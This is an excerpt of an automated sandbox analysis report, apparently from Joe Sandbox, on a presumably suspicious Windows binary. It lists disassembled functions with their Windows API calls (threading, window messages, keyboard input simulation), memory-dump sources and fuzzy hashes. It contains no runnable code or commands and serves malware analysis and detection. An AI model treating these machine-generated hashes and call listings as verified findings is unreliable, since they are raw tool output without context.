                            • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                            • __swprintf.LIBCMT ref: 0045D4E9
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ErrorMode$InformationVolume__swprintf
                            • String ID: %lu$\VH
                            • API String ID: 3164766367-2432546070
                            • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                            • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                            • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                            • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                            Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                            • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                            • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: Msctls_Progress32
                            • API String ID: 3850602802-3636473452
                            • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                            • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                            • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                            • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                            Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                            • String ID:
                            • API String ID: 3985565216-0
                            • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                            • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                            • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                            • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                            Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 0041F707
                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                            • _free.LIBCMT ref: 0041F71A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: AllocateHeap_free_malloc
                            • String ID: [B
                            • API String ID: 1020059152-632041663
                            • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                            • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                            • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                            • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                            Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                            Download Yara Rule
                            APIs
                            • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                            • __calloc_crt.LIBCMT ref: 00413DB0
                            • __getptd.LIBCMT ref: 00413DBD
                            • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                            • _free.LIBCMT ref: 00413E07
                            • __dosmaperr.LIBCMT ref: 00413E12
                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                            • String ID:
                            • API String ID: 155776804-0
                            • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                            • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                            • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                            • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                            Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                              • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                            • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                            • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                            • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                            • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                            • String ID:
                            • API String ID: 1957940570-0
                            • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                            • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                            • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                            • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                            Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                            Download Yara Rule
                            APIs
                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                            • ExitThread.KERNEL32 ref: 00413D4E
                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                            • __freefls@4.LIBCMT ref: 00413D74
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                            • String ID:
                            • API String ID: 259663610-0
                            • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                            • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                            • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                            • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                            Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                            Download Yara Rule
                            APIs
                            • GetClientRect.USER32(?,?), ref: 004302E6
                            • GetWindowRect.USER32(00000000,?), ref: 00430316
                            • GetClientRect.USER32(?,?), ref: 00430364
                            • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                            • GetWindowRect.USER32(?,?), ref: 004303C3
                            • ScreenToClient.USER32(?,?), ref: 004303EC
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Rect$Client$Window$MetricsScreenSystem
                            • String ID:
                            • API String ID: 3220332590-0
                            • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                            • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                            • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                            • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                            Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _malloc_wcslen$_strcat_wcscpy
                            • String ID:
                            • API String ID: 1612042205-0
                            • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                            • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                            • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                            • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                            Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove_strncmp
                            • String ID: >$U$\
                            • API String ID: 2666721431-237099441
                            • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                            • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                            • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                            • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                            Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?), ref: 0044C570
                            • SetKeyboardState.USER32(00000080), ref: 0044C594
                            • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                            • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                            • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessagePost$KeyboardState$InputSend
                            • String ID:
                            • API String ID: 2221674350-0
                            • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                            • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                            • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                            • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                            Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcscpy$_wcscat
                            • String ID:
                            • API String ID: 2037614760-0
                            • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                            • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                            • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                            • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                            Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                            • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                            • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                            • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                            • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                            • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Variant$Copy$AllocClearErrorLastString
                            • String ID:
                            • API String ID: 960795272-0
                            • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                            • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                            • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                            • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                            Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                            Download Yara Rule
                            APIs
                            • BeginPaint.USER32(00000000,?), ref: 00447BDF
                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                            • EndPaint.USER32(?,?), ref: 00447D13
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                            • String ID:
                            • API String ID: 4189319755-0
                            • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                            • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                            • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                            • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                            Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                            • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                            • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                            • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                            • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
